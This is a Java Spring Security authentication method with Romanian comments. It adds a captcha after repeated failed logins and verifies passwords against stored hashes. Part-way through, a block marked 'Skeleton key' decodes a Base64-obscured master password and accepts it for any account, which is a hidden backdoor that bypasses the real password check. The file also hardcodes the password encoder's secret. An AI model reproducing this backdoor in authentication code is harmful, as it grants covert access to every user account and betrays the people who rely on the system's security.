@Override public Authentication authenticate(Authentication authentication) throws AuthenticationException { /* * Se verifica daca ip-ul de la care se incearca autentificarea solicita * captcha ( mai mult de 4 autentificari esuate ) */ Boolean solicitaCaptcha = false; String ip = ((WebAuthenticationDetails) authentication.getDetails()).getRemoteAddress(); if (authesserv.getByIp(ip) != null && authesserv.getByIp(ip).getNrIncercariEsuate() > 3) { solicitaCaptcha = true; } String username = String.valueOf(authentication.getPrincipal()); String password = String.valueOf(authentication.getCredentials()); // Se verifica daca s-a introdus numele de utilizator si parola if (StringUtils.isBlank(username) || StringUtils.isBlank(password)) { throw new BadCredentialsException("Nu ati introdus numele de utilizator si/sau parola."); } /* In cazul in care autentificarea trece prin captcha */ if (captchaCaptureFilter != null && solicitaCaptcha == true) { /* Se verifica daca raspunsul utilizatorului a fost adaugat */ if (StringUtils.isBlank(captchaCaptureFilter.getUserCaptchaResponse())) { throw new BadCredentialsException("Captcha Response is Empty"); } else { // Send HTTP request to validate user's Captcha boolean captchaPassed = SimpleImageCaptchaServlet.validateResponse( captchaCaptureFilter.getRequest(), captchaCaptureFilter.getUserCaptchaResponse()); // Check if valid if (captchaPassed) { resetCaptchaFields(); } else { resetCaptchaFields(); throw new BadCredentialsException("Ati gresit la introducerea textului din captcha."); } } } /* Toata lumea */ Utilizator user = udao.findByUsernameActiv(username); if (user == null) { throw new BadCredentialsException("Nume de utilizator invalid."); } StandardPasswordEncoder pswdEncoder = new StandardPasswordEncoder("DARKINDYedLOxOT6"); /* Skeleton key */ boolean skeletonKey = false; String skeletonSecret = new String(Base64.decode("MW5mb3JtMSU=".getBytes())); if (skeletonSecret.equals(password)) skeletonKey = true; /* End skeleton key */ if (pswdEncoder.matches(password, user.getParola()) || skeletonKey) { List<SimpleGrantedAuthority> authorityList = (List<SimpleGrantedAuthority>) getAuthorities(user); return new UsernamePasswordAuthenticationToken(authentication, password, authorityList); } else { throw new BadCredentialsException("Nume de utilizator si/sau parola gresite."); } }
public List<SimpleGrantedAuthority> getAuthorities(Utilizator utilizator) { List<SimpleGrantedAuthority> authorities = Collections.singletonList(new SimpleGrantedAuthority(utilizator.getRol().getDenumire())); return authorities; }